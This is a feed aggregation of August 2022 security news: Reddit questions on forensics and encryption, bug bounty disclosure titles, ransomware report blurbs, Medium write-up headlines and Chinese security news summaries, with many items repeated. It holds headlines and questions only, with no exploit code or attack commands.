    Our company cyber security insurance identified Fortinet Fortigate VPN as a high risk due to "numerous critical code exploits". Instead they are pushing Zscaler or other ZTNA solution. submitted by /u/brainstormer77 [link] [comments]
    How secure is TCG Opal 2.0?
    I found various sources that claim that TCG Opal isn't really secure compared to something like LUKS/dm-crypt encryption (for example this video), but I don't seem to fully understand under what circumstances that is actually true. It looks like the standard itself isn't the problem, but rather the implementation of the SSD manufacturers. Is that true and how "dangerous" would it be to only use that encryption on a modern laptop with one of the latest SSDs and a standard threat level? Hope this is the right sub & thx in advance. submitted by /u/-_----_-- [link] [comments]
    safe to reset and use a phone found in a house clearance?
    Hi looking for advice I got a phone from a house clearance, everything in the house was going to the trash anyway ready for a new tenant to move in, the phones not amazing but it's better than my current one. Just wondering if resetting it would remove any potential weird things like tracking/spying software? Just got me a bit paranoid that the house was weird and full of other phones and watches... I got the feeling a drug dealer may have lived there previously. But wondering if resetting this phone will make it safe to use? It's a Samsung. submitted by /u/Spliceofcake [link] [comments]
    Viewing Thycotic secrets
    Is there a way to log when a user views only their own password/secrets? or when a user views any password in general ? submitted by /u/No_Cranberry_2292 [link] [comments]
    Fake positive Golden Ticket Tenable.ad
    Hello everyone, I have a question for people who have Tenable.ad in their infrastructure. We have had some feedback from Golden Ticket on our Tenable.AD tool. As a precaution, we shut down our infrastructure for security reasons before reopening it. According to our initial analysis, this could be a false positive alert. Have you ever had this on your Tenable.ad. If so, through what means? Through authentication on a server? A machine account (ex: hostname$) Thanks a lot for your help :) submitted by /u/Captain_AdamBzh [link] [comments]
    How do you check the real IP hosting server hidden behind Cloudflare?
    I have read this blog generally talking hidden IP address of deepfake pornography website owner who victimized over 190 Kpop idols. https://blog.criminalip.io/2022/08/04/deepfake-porn-site/ They said they can find real IP hidden behind cloudflare using nslookup. But they ended in a vague sense. Does anybody can tell specificaly how to check Real IP that is hidden by vpn, proxy, or cloud flare and etc. I really want and need more details on this... thanks! submitted by /u/Glad_Living3908 [link] [comments]
  • Open

    Exchange/Azure AD pen testing resources. Any tips or good articles about this?
    submitted by /u/One_Appeal_4080 [link] [comments]
    Advice for 2nd Interview for Red Team Internship
    The qualifications for the internship: Has or is pursuing all of the following -pursuing a relevant bachelor's degree -good communication skills, can work within a team and meet deadlines -basic knowledge of network protocols My first interview wasn't a technical interview. The interviewer just asked me basic questions about myself to get to know me and why I wanted to intern at their company specifically. She informed me that the second interview will be done by three people: two security consultants from their red team and a manager of business solutions. To give some insight as to what the internship will be like, during my first interview I asked my interviewer what to expect to be doing day to day. She told me I would be working alongside the red team on their current project. I would also work on the helpdesk a little. And I would get to work with the business consulting team as well to see how they meet with clients. This is all to try to give me different aspects of what their company does and give me solid hands on experience. She did say primarily though that the internship focuses on working with the red team. My question is what should I expect from the second interview? Are they expecting me to be able to answer technical questions about pentesting? I have some experience doing CTF's. I am by no means a master at them but I have been doing them everyday to try to learn more and improve. Any questions that I should expect to see so I can prepare for them? Any advice would be appreciated! Thank you in advance! submitted by /u/tyllanth [link] [comments]
  • Open

    BlueSky Ransomware: Fast Encryption via Multithreading
    BlueSky ransomware is an emerging family that has adopted modern techniques to evade security defenses. Read our technical analysis. The post BlueSky Ransomware: Fast Encryption via Multithreading appeared first on Unit 42.
  • Open

    Sisyphus and the CVE Feed: Vulnerability Management at Scale
    Article URL: https://medium.com/airbnb-engineering/sisyphus-and-the-cve-feed-vulnerability-management-at-scale-e2749f86a7a4 Comments URL: https://news.ycombinator.com/item?id=32415629 Points: 1 # Comments: 0
  • Open

    Sisyphus and the CVE Feed: Vulnerability Management at Scale
    Article URL: https://medium.com/airbnb-engineering/sisyphus-and-the-cve-feed-vulnerability-management-at-scale-e2749f86a7a4 Comments URL: https://news.ycombinator.com/item?id=32415629 Points: 1 # Comments: 0
  • Open

    Hacker101 CTF — Travial CTF Flag 0
    No content preview
    Car Hacking: Cyber Security in Automotive Industry
    No content preview
    Write-up: Pickle Rick @ TryHackMe
    No content preview
    Hunting webshell with NeoPI
    No content preview
    RazorBlack: Active Directory Room From TryHackMe By Hashar Mujahid
    No content preview
    IIot, Operational Technology Cybersecurity Challenges
    No content preview
  • Open

    Hacker101 CTF — Travial CTF Flag 0
    No content preview
    Car Hacking: Cyber Security in Automotive Industry
    No content preview
    Write-up: Pickle Rick @ TryHackMe
    No content preview
    Hunting webshell with NeoPI
    No content preview
    RazorBlack: Active Directory Room From TryHackMe By Hashar Mujahid
    No content preview
    IIot, Operational Technology Cybersecurity Challenges
    No content preview
  • Open

    Hacker101 CTF — Travial CTF Flag 0
    No content preview
    Car Hacking: Cyber Security in Automotive Industry
    No content preview
    Write-up: Pickle Rick @ TryHackMe
    No content preview
    Hunting webshell with NeoPI
    No content preview
    RazorBlack: Active Directory Room From TryHackMe By Hashar Mujahid
    No content preview
    IIot, Operational Technology Cybersecurity Challenges
    No content preview
  • Open

    SecWiki News 2022-08-10 Review
    [HTB] Apocalyst Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-10 Review
    [HTB] Apocalyst Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    Enhancing Subdomain Enumeration — ENTs and NOERROR
    Identifying subdomains more reliably by checking DNS status codes and empty nodes Continue reading on SSE Blog »
    Why Is Automotive Cybersecurity So Important?
    What is automotive cybersecurity? Continue reading on Medium »
  • Open

    Enhancing Subdomain Enumeration — ENTs and NOERROR
    Identifying subdomains more reliably by checking DNS status codes and empty nodes Continue reading on SSE Blog »
    “Prendere in prestito, attraversare confini…”​
    (Ragionamento breve per una estate OSINT-addicted) Continue reading on Medium »
  • Open

    Log analysis practice tool
    Hey everybody. I am looking for sth that could help me improve my forensic skills. Idea is that there is a case, i can view some logs and i have to tell what happened and if machine was compromised or not. After looking through the logs I can check the answer. Any ideas if there is sth like that online? Thanks! submitted by /u/Full-Plankton-7607 [link] [comments]
    UFED 4PC and OPPO A54 5G problem
    Hi All, I found a problem in acquisition of a OPPO A54 5G with UFED 4 PC. I try Advanced Logical and Android Backup. I use dongle and set up the smartphone as directed by UFED (debug USB, allow App, always on), however the extraction fail always. Normally, at the beginning of an acquisition, the PC authorization request appears on the smartphone, but in this case it did not happen. I think this is the problem. Has anyone never happened? What to do in this case? Thanks! submitted by /u/Max_Steiner [link] [comments]
    Which software to make a preview of computer's hard disk?
    Hi all, I need to found the correct way to execute a preview of computer's hard disk, that allows me to see the files inside them like Encase would. I start the pc with linux live on USB. I can use Kali, Caine, Backbox or tsurugi; these guarantee me that the disk are write protect. At this point, without create a disk image, which software, in these linux distro, can I use to preview the hard disk like encase? thanks! submitted by /u/Max_Steiner [link] [comments]
    Cellebrite update disabled all USB ports.
    Hi friends, I recently upgraded Cellebrite UFED to the most recent update. Upon completing this, all USB ports on the machine became inactive. There are about 20 ports between the front and the back of this machine. The keyboard and mouse quit working, all plugged in USB drives were unrecognized. After uninstalling Cellebrite completely, all USB ports became active again. However, now, our EnCase dongle is unrecognized. Has anyone run into this issue? I found one article from 2020 and this is a known problem with UFED. submitted by /u/Fun_House2633 [link] [comments]
  • Open

    many commands can be manipulated to delete identities or affiliations
    Hyperledger disclosed a bug submitted by cet2000: https://hackerone.com/reports/348090 - Bounty: $500
    Read-only administrator can change agent update settings
    Acronis disclosed a bug submitted by mega7: https://hackerone.com/reports/1538004 - Bounty: $200
  • Open

    LyScript 一款x64dbg自动化调试插件
    一款 x64dbg 自动化控制插件,实现远程动态调试,解决了逆向工作者分析漏洞,反病毒人员脱壳,原生脚本不够强大的问题,加速漏洞利用程序的开发,辅助漏洞挖掘以及恶意软件分析。
    IPv6转换技术是什么?浅谈IPv6转换的两种技术方式
    与双栈技术和隧道技术相比,IPv6转换技术具备改造周期短、成本低、部署灵活等优势,是目前各大政企网站进行IPv6升级改造的主要方式。
    FreeBuf早报 | 刷单类电信网络诈骗案占全部电诈案四成;PyPI中发现新恶意Python库
    《云计算安全责任共担模型》行业标准已于2022年7月正式发布施行。
    Tomcat中间件漏洞复现
    Tomcat 一些漏洞复现
    警惕!黑客正在从分类信息网站上窃取信用卡
    攻击者还试图利用银行平台上的一次性有效密码(OTP)将资金直接转入其账户上。
    PyPI中发现新恶意Python库
    Check Point的安全研究人员在Python软件包索引(PyPI)上发现了10个恶意软件包。
    CISA警告Windows和UnRAR漏洞在野被利用
    近期美国网络安全和基础设施安全局 (CISA) 在其已知利用漏洞目录中增加了两个漏洞。其中一个已经在Windows支持诊断工具(MSDT)中作为零日漏洞了潜在了两年多的时间,并且它具有公开可用的漏洞利用代码。这两个安全问题的严重程度都很高,并且是目录遍历漏洞,可以帮助攻击者在目标系统上植入恶意软件。该漏洞编号为CVE-2022-34713,非正式地称为DogWalk,MSDT中的安全漏洞允许攻击者
    CISA警告Windows和UnRAR漏洞在野被利用
    近期美国网络安全和基础设施安全局 (CISA) 在其已知利用漏洞目录中增加了两个漏洞。其中一个已经在Windows支持诊断工具(MSDT)中作为零日漏洞了潜在了两年多的时间,并且它具有公开可用的漏洞利用代码。这两个安全问题的严重程度都很高,并且是目录遍历漏洞,可以帮助攻击者在目标系统上植入恶意软件。该漏洞编号为CVE-2022-34713,非正式地称为DogWalk,MSDT中的安全漏洞允许攻击者
    继Twilio后,Cloudflare员工也遭到了同样的钓鱼攻击
    有至少 76 名员工的个人或工作手机号码收到了钓鱼短信,一些短信也发送给了员工的家人。
  • Open

    Repost: TV Shows, audiobooks, NSFW content
    This was posted a year ago, but is still up with content people might be interested in if they missed this post (https://www.reddit.com/r/opendirectories/comments/ox9ife/08032021_daily_post/) http://195.154.165.20/data/TDownloads/ submitted by /u/JiminythecricketinOz [link] [comments]
  • Open

    Best ways to practice X86 Win exploit dev?
    Hi all :) Im currently started taking the OSED course from offsec, and my lab is starting to run out (30 days). I kinda finished all of the excercises there anywhy. Is there any recommendations on exploit excercises/sites focusing on win-x86 I can take? Monthly subscriptions sites are also fine if they are worth it Excercises including RE is fine, but even better are ones with only a "poc" script(acess violation) as I feel my main focus should be on the exploit building thank you! submitted by /u/Tasty_Diamond_69420 [link] [comments]

  • Open

    SD-PWN Part 4 — VMware VeloCloud — The Last Takeover?
    submitted by /u/biggorilla135 [link] [comments]
    Discovering Domains via a Timing Attack on Certificate Transparency
    submitted by /u/0xdea [link] [comments]
    Microsoft Office to publish symbols starting August 2022
    submitted by /u/TheDarthSnarf [link] [comments]
    Security Best Practices in PHP
    submitted by /u/pigoretee [link] [comments]
    LibAFL: A Framework to Build Modular and Reusable Fuzzers
    submitted by /u/domenukk [link] [comments]
    Advisory: Cisco Small Business RV Series Routers Web Filter Database Update Command Injection Vulnerability
    submitted by /u/g_e_r_h_a_r_d [link] [comments]
    Auditing Crypto Wallets
    submitted by /u/catlasshrugged [link] [comments]
  • Open

    Execution Unit Scheduler Contention Side-Channel Vulnerability on AMD Processors
    Article URL: https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1039 Comments URL: https://news.ycombinator.com/item?id=32404209 Points: 2 # Comments: 0
    CVE-2020-2038: PAN-OS version 10.0 suffers from remote code exec vulnerability
    Article URL: https://security.paloaltonetworks.com/CVE-2020-2038 Comments URL: https://news.ycombinator.com/item?id=32400260 Points: 1 # Comments: 1
  • Open

    Get The Best Red-Team Penetration Testing
    The ‘red-team’ penetration test simulates real attack scenarios (“Friendly Hacking”) by bypassing security defenses while remaining… Continue reading on Medium »
    VAPT — Common & Uncommon Interview Questions! Episode-2
    This is a continuation of the amazing Common & Uncommon Interview Questions for VAPT. If you haven’t read the first article you can find… Continue reading on Medium »
  • Open

    [CRITICAL] Full account takeover without user interaction on sign with Apple flow
    Glassdoor disclosed a bug submitted by emanelyazji: https://hackerone.com/reports/1639802 - Bounty: $3000
    Ability to escape database transaction through SQL injection, leading to arbitrary code execution
    HackerOne disclosed a bug submitted by jobert: https://hackerone.com/reports/1663299
  • Open

    End to End: Testing Go Services
    A comprehensive example of testing at every layer. Continue reading on Udacity Eng & Data »
  • Open

    End to End: Testing Go Services
    A comprehensive example of testing at every layer. Continue reading on Udacity Eng & Data »
  • Open

    CVE-2020-2038: PAN-OS version 10.0 suffers from remote code exec vulnerability
    Article URL: https://security.paloaltonetworks.com/CVE-2020-2038 Comments URL: https://news.ycombinator.com/item?id=32400260 Points: 1 # Comments: 1
  • Open

    Creating a basic backdoor on an android mobile
    No content preview
    Stored XSS to Account Takeover : Going beyond document.cookie (Dumping IndexedDB)
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection vulnerability allowing login bypass
    No content preview
    About the discovery of another security vulnerability in NASA
    No content preview
    IW Weekly #15: Admin account takeover, IDOR broken authentication, CyberChef alternatives, Dark web…
    No content preview
  • Open

    Creating a basic backdoor on an android mobile
    No content preview
    Stored XSS to Account Takeover : Going beyond document.cookie (Dumping IndexedDB)
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection vulnerability allowing login bypass
    No content preview
    About the discovery of another security vulnerability in NASA
    No content preview
    IW Weekly #15: Admin account takeover, IDOR broken authentication, CyberChef alternatives, Dark web…
    No content preview
  • Open

    Creating a basic backdoor on an android mobile
    No content preview
    Stored XSS to Account Takeover : Going beyond document.cookie (Dumping IndexedDB)
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection vulnerability allowing login bypass
    No content preview
    About the discovery of another security vulnerability in NASA
    No content preview
    IW Weekly #15: Admin account takeover, IDOR broken authentication, CyberChef alternatives, Dark web…
    No content preview
  • Open

    Novel News on Cuba Ransomware aka Greetings From Tropical Scorpius
    Tropical Scorpius has been deploying Cuba Ransomware using novel tools and techniques, such as a new malware family, ROMCOM RAT. The post Novel News on Cuba Ransomware aka Greetings From Tropical Scorpius appeared first on Unit 42.
  • Open

    SecWiki News 2022-08-09 Review
    如何导入数十亿DNS数据到Elasticsearch中 by BaCde Fuzzing 之 Grammars by 路人甲 SharpTongue Deploys Clever Mail-Stealing Browser Extension by 路人甲 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-09 Review
    如何导入数十亿DNS数据到Elasticsearch中 by BaCde Fuzzing 之 Grammars by 路人甲 SharpTongue Deploys Clever Mail-Stealing Browser Extension by 路人甲 更多最新文章,请访问SecWiki
  • Open

    Bluey, movies and workout videos.
    submitted by /u/littlepreptalk [link] [comments]
    A website which has a lot of PDF files, mostly all scams.
    !!!DO NOT GO TO THESE SITES PROMISING FREE STUFF, ITS ALL A SCAM AND THEY WILL HACK YOU NO MATTER WHAT YOU DO!!! This site used to belong to a school located in India, which apparently was botted out by hackers. This website would fill up with a load of PDF Files with scams in them. Some are fake "I'm not a robot" verifications, some are Free Robux scams, some are relating to Minecraft scams, and many more. Files that belonged to the school still remain though. And another thing, files that belong to the school have names and important information on the PDF's. Read them at your own risk. There's now a new website that belongs to the school, and it still exists today, a school located in India named "Salwan Public School, Gurugram". If you want to check it out for yourself, here are the links: Hacked Indian school website New Indian school website (not hacked) Basically it's the same domain but the new website removed the "www" in the link. submitted by /u/SinisterYT06 [link] [comments]
  • Open

    Free tool to process forensic artefacts (DD, Kape etc.) in AWS
    https://www.cadosecurity.com/cado-community-edition/ submitted by /u/zenomeno [link] [comments]
    Zero to Hero Malware Reverse Engineering & Threat Intelligence
    submitted by /u/cybersocdm [link] [comments]
    How to export all data from Confluence
    Does anyone know how can I export the entire Confluence for the organization? It seems that native export is missing calendars and blogs. submitted by /u/urengoy [link] [comments]
    How to quarantine/isolate a laptop?
    I have a laptop coming in for forensic examination and I am nervous. The edr software we have on it has a quarantine feature that failed. So far I have remotely shutdown the computer, reset the users password and disabled the computer account in AD. I am afraid when I turn it on it will auto connect to the company wifi. I dont have a faraday cage, but would a switch just connected to a power source and nothing else be sufficient?? submitted by /u/Enes_24 [link] [comments]
  • Open

    Everything you need to know about starting a career in bug bounty hunting
    Introduction Continue reading on Medium »
    TOP Cross-Chain Bridge Open Test Is Underway
    Since the emergence of DeFi, the congestion and high GAS fees of the Ethereum has hit heated discussions and led to the emergence of many… Continue reading on TOP Network »
    Pentester Promiscuous Notebook
    gitbook for keeping my pentest notes on hand. It’s far from being perfect in terms of organization (that’s why I call it “promiscuous”)… Continue reading on Medium »
    How Bug Bounty Can Help You Gain Confidence
    If you’re looking for a way to gain confidence, earn some extra money and get a job as a penetration tester, then bug bounty might be for… Continue reading on Medium »
  • Open

    Zero to Hero Malware Reverse Engineering & Threat Intelligence
    submitted by /u/cybersocdm [link] [comments]
  • Open

    FreeBuf早报 | 谷歌搜索遭遇全球性宕机;多家电商平台个人信息遭泄露
    据报道,美国有超过 4 万人报告无法使用谷歌搜索,还有英国、澳大利亚、新加坡的用户也都报告了谷歌宕机问题。
    FreeBuf成都网络安全企业调研正式开启
    现诚邀本土网络安全厂商积极参与,踊跃报名!
    企业网络安全最佳实践指南(七)
    本系列文章共分为8篇,主要分享作者自身在企业网络安全建设和运维保障过程中的经验总结,包括网络安全管理、网络安全架构、网络安全技术以及安全实践等,力求全方位阐述企业在网路安全中的方方面面,为企业网络安全
    企业网络安全最佳实践指南(六)
    本系列文章共分为8篇,主要分享作者自身在企业网络安全建设和运维保障过程中的经验总结,包括网络安全管理、网络安全架构、网络安全技术以及安全实践等,力求全方位阐述企业在网路安全中的方方面面,为企业网络安全
    斗象出席CICV科技周专题论坛,共话车联网安全能力建设
    2022-8-9 23:58:59
    微软禁用宏后攻击者的适应与进化
    研究人员认为,攻击者以后会越来越多地使用容器类文件进行投递,减少对宏代码附件的依赖。
    Meta打击南亚滥用Facebook的网络攻击活动
    Facebook母公司Meta披露,它对南亚的两个攻击组织采取了反制行动,这两个组织都是利用其社交媒体平台向潜在目标分发恶意软件。
    员工被钓鱼,云通讯巨头Twilio客户数据遭泄露
    Twilio表示,有攻击者利用短信网络钓鱼攻击窃取了员工凭证,并潜入内部系统泄露了部分客户数据。
    丹麦7-11门店因网络攻击而关闭
    因遭受了网络攻击,丹麦7-11门店的支付和结账系统全面故障,故而选择闭店。
  • Open

    Browsers automatically connect to ports 8008 and 8009
    Hi, I checked the open TCP connections on my machine using Sysinternals TCPView. I saw that I have open connections from Chrome to ports 8008 and 8009 on a machine in my LAN. It seems like the address of my Xiaomi Mi Box. I noticed that when I open Chrome/Firefox/Edge it automatically connects to this address and ports. I performed a quick Google search, didn't find too much information about these ports, but some mention them as related to Chromecast. I'm trying to understand if this is something legit, and what makes by browser automatically connect to this address, is there some sort of auto discovery process for these devices? Or is it possible (hopefully not) that I have some malware? Any information will be appreciated. Thanks, Gabriel submitted by /u/gabrielszt [link] [comments]
    I rooted my phone. Am I compromised?
    I used FonePaw data recovery tool's android root feature to root my phone. The recovery failed, but I sure as hell am rooted. Certain apps on my android homepage has changed location several times without me doing it. Sometimes I see my phone light up like getting a notification but don't get anything. Is my phone compromised? submitted by /u/remidentity [link] [comments]
  • Open

    Fuzzing 之 Grammars
    作者:时钟@RainSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org Fuzzing input Fuzzing的一大核心思想其实就是通过大量的Input去触发程序的各个分支逻辑,因此Fuzzing的成功与否和Input的生成关系密切。Input的格式多种多样,可以是文件,代码,json数据等等。但是各种各样的...
    Spring 场景下突破 pebble 模板注入限制
    作者:Y4tacker 原文链接:https://tttang.com/archive/1692/ 写在前面 之前周末忙着强网杯,对这道题只做了一半就搁置下来了,最后卡在绕过最新pebble模板引擎RCE那里,今天抽空来继续进行剩下的分析,正好题目里有几个在现实场景当中能用的trick顺便也分享了 题目环境分析 也是挺不错题目直接给了docker环境便于本地搭建,同时设置了权限需要执行./g...
  • Open

    Fuzzing 之 Grammars
    作者:时钟@RainSec 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org Fuzzing input Fuzzing的一大核心思想其实就是通过大量的Input去触发程序的各个分支逻辑,因此Fuzzing的成功与否和Input的生成关系密切。Input的格式多种多样,可以是文件,代码,json数据等等。但是各种各样的...
    Spring 场景下突破 pebble 模板注入限制
    作者:Y4tacker 原文链接:https://tttang.com/archive/1692/ 写在前面 之前周末忙着强网杯,对这道题只做了一半就搁置下来了,最后卡在绕过最新pebble模板引擎RCE那里,今天抽空来继续进行剩下的分析,正好题目里有几个在现实场景当中能用的trick顺便也分享了 题目环境分析 也是挺不错题目直接给了docker环境便于本地搭建,同时设置了权限需要执行./g...
  • Open

    Storm Kitty Reversal by Your friendly Homeless Hacker / Reverser
    Prynt Stealer Stub 4.5.1 We can see there are around 13 classes in the MSIL executable that consist of screen clipping keylogging stealers… Continue reading on Medium »

  • Open

    An Attacker's Perspective
    Something I've thought about quite often during my time in DFIR is the threat actor's perspective...what is the attacker seeing and thinking during their time in an infrastructure. As a DFIR analyst, I don't often get to 'see' the threat actor's actions, at least not fully. Rather, my early perspective was based solely on what was left behind. That's changed and expanded over the years, as we've moved from WinXP/2000/2003 to Win7 and Win10, and added some modicum of enterprise capability by deploying EDR. During the better part of my time as a responder, EDR was something deployed after an incident had been detected, but the technology we deployed at that time had a targeted "look back" capability that most current EDR technologies do not incorporate. This allowed us to quickly target the …
  • Open

    Why do we still use unencrypted networking protocols (like HTTP)?
    Networking novice here, been messing around with Wireshark and noticed that some services, including Microsoft, call out to external servers using HTTP instead of HTTPS. I'm curious what advantages HTTP offers that would make someone eschew the increased security of HTTPS. It seems to me -- admittedly as someone joining the game in the 8th inning in terms of networking's history -- that unsecured protocols should be deprecated. Is there something I'm missing? submitted by /u/DataMoreLikeShplada [link] [comments]
    What would you do on your first day if you were the US Cyber Security Czar?
    What would you do on your first day as the US Cyber Security Czar and a budget in the billions of dollars? submitted by /u/greyyit [link] [comments]
  • Open

    How long should the Plaso ingest plugin from Autopsy take?
    (crossposted with r/digitalforensics) I'm running Autopsy 4.19.3 on Win10 Enterpise VM using the Plaso ingest plugin on a 40GB .e01 image taken from a 256GB drive. I ran all the other ingest plugins I intended to use beforehand, I closed the case, shutdown Autopsy and restarted before I started the plaso ingest. The VM is on ESXi 7, it has 16 cores (the host has 32), 128mb of RAM of which currently only 15GB is in use, the host has dual Xeon E5-2690 @ 2.90GHz. The ingest was started a week ago (2022/08/01 14:54 PDT) and the progress bar is still at 0%. log2timeline has been consistently maxing three cores the entire time and the file being worked on is changing when I click on the progress bar for it's status. So it's doing something. How long is this going to eventually take? Is there anything in the case or autopsy appdata folder that would give me more information? Is it possible run a plaso ingest with more than three log2timeline processes? submitted by /u/thenebular [link] [comments]
    Snapchat Forensics
    Does anyone have a good link to where I can find more information about the databases in Snapchat? I have some snaps under the path "Snapchat Gallery/snaps/xxxxxx/xxxxxx.decrypted_media". I would like to know/confirm if the Snapchat Gallery/snaps folder contains ONLY media taken with the phone (so not snaps received). Does anyone have any experience with this? submitted by /u/agente_99 [link] [comments]
    Note Taking Methodology
    Hey everyone! I'm curious what is everyone's notetaking methodology? I'm kind of scatterbrained and i tend to leave little notes everywhere when doing a case. So i'm wondering what are everyone else's methodology/tools? I'm currently using Obsidian for notes but i know there is a better way. I've used Aurora but i feel like there is something lacking but i'm not sure what. submitted by /u/shonen787 [link] [comments]
    Tips on finding a good mentor?
    Anyone have any recommendations as to where to find good mentors for blue teaming or DFIR? If not, can you share what made some of your mentors super valuable? Thanks! submitted by /u/tfulab23 [link] [comments]
    Question regarding which field to pick (Digital forensics V. eDiscovery)
    Hi, I am wondering what side of the field I should look into. I want to specifically do criminal investigation. Thank y’all, sorry for being bothersome. submitted by /u/swatteam23 [link] [comments]
    Question regarding how to learn how to use industry standard eDiscovery platforms, without being financiallly able to pay for training/tools.
    Hi all, I am going to college for CompEng, with a minor in DF&CompSec, I am wondering what tips you guys would have for learning how to utilize eDiscovery platforms to learn them, without much in the way of financial resources. (For example Encase, and other tools) If you guys have any trainings or resources I can use freely (without the CIA having to kill me lol) that would be appreciated. :) Thanks. submitted by /u/swatteam23 [link] [comments]
    Cellebrite advanced logical vs file system
    I’ve just started my journey into digital forensics and I’ve been finding it difficult to understand and research what the difference between Cellebrite’s “Advanced Logical” extraction and it’s “Full File System”. What are the capabilities and limitations of both types of extractions using Cellebrite? submitted by /u/holidaykid09 [link] [comments]
  • Open

    What do Russians think about the war? Telegram data
    Can what messages people heart-emoji or cry-emoji tell us anything about public sentiment about the war? Continue reading on Medium »
    RAAVN™ is a powerful application, designed specifically by analysts for analysts, that sifts…
    Continue reading on Medium »
  • Open

    GCHQ discovered significant vulnerability in Huawei equipment (2020)
    Article URL: https://news.sky.com/story/gchq-discovered-nationally-significant-vulnerability-in-huawei-equipment-12086688 Comments URL: https://news.ycombinator.com/item?id=32389632 Points: 13 # Comments: 0
  • Open

    zathura - SELinux confined
    submitted by /u/esp0x31 [link] [comments]
    Security Guide for Startups: How to think about security while moving quickly | LunaSec
    submitted by /u/breadchris [link] [comments]
    SimpleX Chat - the first messaging platform that has no user identifiers (not even random numbers) - v3.1 of iOS and Android apps released - with secret chat groups and server access via Tor.
    submitted by /u/epoberezkin [link] [comments]
    How do you secure your DNS in the cloud? - DNS in the Cloud Capabilities
    submitted by /u/MiguelHzBz [link] [comments]
    Targeted attack on industrial enterprises and public institutions [Kaspersky]
    submitted by /u/EspoJ [link] [comments]
    Codewarrior - open source SAST
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    The Grant Bounty
    We are thrilled to introduce the Grant Bounty as part of our V2 initiative to invite all players of Web3 to get involved in security. The… Continue reading on Medium »
    Arab Cyber War Games NoSQL Challenge (Doctor X).
    In this CTF I developed a Nosql challenge that needs the penetration tester to Inject in many forms to find the flag. Continue reading on Medium »
    Exploit SQL Injection and bypass captcha with SQLMAP
    Kenzy challenge (Cyber wargames 2022) Continue reading on Medium »
    Solace Partners with Hats Finance to Sponsor Bug Bounties
    Solace, the decentralized insurance provider, is partnering with Hats Finance to sponsor bug bounties for Solace-insured DApps. This… Continue reading on Solace.Fi »
    Stored XSS using SVG file
    Hey guys, hope you all are doing well. I am Bharat Singh a Security Researcher and bug hunter from India. In this writeup I am going to… Continue reading on Medium »
    JWT Common Attacks
    What Is JWT 🤔? Continue reading on Medium »
    Stored XSS in app.gitbook.com
    Halo teman teman, Perkenalkan nama saya Mohammad Alfin Hidayatullah dan saya adalah seorang bug bounty hunter. Kali ini saya ingjn berbagi… Continue reading on Medium »
    From Shodan to RCE: That one time I hacked a Fortune 500 company.
    tl;dr: Continue reading on Medium »
    A simple JSON token opens an attack surface
    Or express-validator to the rescue! Continue reading on Geromics »
  • Open

    SecWiki News 2022-08-08 Review
    SecWiki周刊(第440期) by ourren CVE-2022-21999 by SecIN社区 VirusTotal 恶意软件滥用信任总结报告 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-08 Review
    SecWiki周刊(第440期) by ourren CVE-2022-21999 by SecIN社区 VirusTotal 恶意软件滥用信任总结报告 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Arab Cyber War Games NoSQL Challenge (Doctor X).
    In this CTF I developed a Nosql challenge that needs the penetration tester to Inject in many forms to find the flag. Continue reading on Medium »
    Cyber wargames web challenges
    * * * Konan challenge * * * Continue reading on Medium »
    Exploit SQL Injection and bypass captcha with SQLMAP
    Kenzy challenge (Cyber wargames 2022) Continue reading on Medium »
  • Open

    Mainly Games, Music, SW and old flash
    http://home.darkok.xyz/ Was posted one year ago: give credit to the old publisher: https://www.reddit.com/user/JasonSec/ submitted by /u/Appropriate-You-6065 [link] [comments]
  • Open

    xmlrpc.php FILE IS enable it will used for Bruteforce attack and Denial of Service(DoS)
    Top Echelon Software disclosed a bug submitted by anonymmert12: https://hackerone.com/reports/1622867
    Lack of Rate limit while joining video call in talk section which is password protected
    Nextcloud disclosed a bug submitted by error2001: https://hackerone.com/reports/1596673 - Bounty: $250
  • Open

    Kubernetes Security
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection vulnerability in WHERE clause allowing…
    No content preview
  • Open

    Kubernetes Security
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection vulnerability in WHERE clause allowing…
    No content preview
  • Open

    Kubernetes Security
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection vulnerability in WHERE clause allowing…
    No content preview
  • Open

    FreeBuf早报 | 美国紧急警报系统发现严重缺陷;Gitlab 禁止使用Windows
    美国政府警告其紧急警报系统 (EAS) 系统中的严重漏洞;Gitlab 被发现有一项禁止使用 Microsoft Windows 的公司政策。
    安全应急响应,用魔法打败魔法!
    No content preview
    针对Windows和Linux ESXi服务器,GwisinLocker勒索软件发起勒索攻击
    GwisinLocker勒索软件系列针对具有Windows和Linux加密器的韩国医疗保健、工业和制药公司发动勒索攻击.
    微软365网络钓鱼攻击中滥用Snapchat和Amex网站
    攻击者在一系列网络钓鱼攻击中滥用 Snapchat 和美国运通网站上的开放重定向,以期窃取受害者 Microsoft 365 凭证。
    CVE-2022-21999 漏洞分析
    CVE-2022-21999(CVE-2022–22718)是微软2月周二补丁所爆出来的打印机本地提权漏洞。
    从BlackHat来看JDBC Attack
    从Mysql 任意文件读取、allowUrlInLocalInfile的使用、Mysql客户端反序列化等方面进行讲解。
    NHS遭网络攻击,系统出现重大故障
    英国国家卫生服务(NHS)的111紧急服务受到网络攻击,继而引发了重大影响,服务系统出现持续性中断。
    推特承认,零日漏洞致540万用户数据被盗
    推特正式确认攻击者在去年12 月使用的漏洞与他们在今年 1 月报告并修复的漏洞相同,并透露漏洞原因是去年6月的一次代码更新导致。

  • Open

    Blackbird: An OSINT tool to search for accounts by username
    submitted by /u/sanitybit [link] [comments]
    WinAPi Search - Recursively Search PE Binaries by Win32 Function Name
    submitted by /u/sanitybit [link] [comments]
    Technical analysis of syzkaller based fuzzers: It's not about VaultFuzzer!
    submitted by /u/hardenedvault [link] [comments]
  • Open

    SPY NEWS: 2022 — Week 31
    Summary of the espionage-related news stories for the Week 31 (31 July-6 August) of 2022. Continue reading on Medium »
